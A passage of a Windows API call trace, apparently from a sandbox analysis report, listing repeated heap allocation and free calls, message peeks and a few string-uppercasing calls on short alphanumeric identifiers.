lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0199.950] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.953] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0199.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0199.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0199.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0199.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0199.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0199.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.955] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0199.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0199.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0199.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0199.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.960] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0199.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.960] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.961] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0199.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0199.961] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.963] RtlAllocateHeap 